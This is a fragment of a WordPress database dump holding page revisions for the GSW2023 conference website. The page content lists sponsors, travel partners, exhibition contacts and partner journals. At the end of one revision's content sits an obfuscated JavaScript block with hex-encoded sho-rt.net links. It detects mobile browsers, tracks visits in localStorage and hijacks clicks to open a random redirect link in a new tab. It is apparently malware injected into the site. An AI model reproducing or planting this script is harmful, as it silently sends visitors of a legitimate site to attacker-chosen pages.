width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 03:12:03','2023-08-16 03:12:03','',3066,'https://gsw2023.com/?p=5284',0,'revision','',0),
(5285,1,'2023-08-16 03:14:17','2023-08-16 03:14:17','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155359389{margin-top: 85px !important;margin-right: -85px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155547075{margin-left: 20px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px 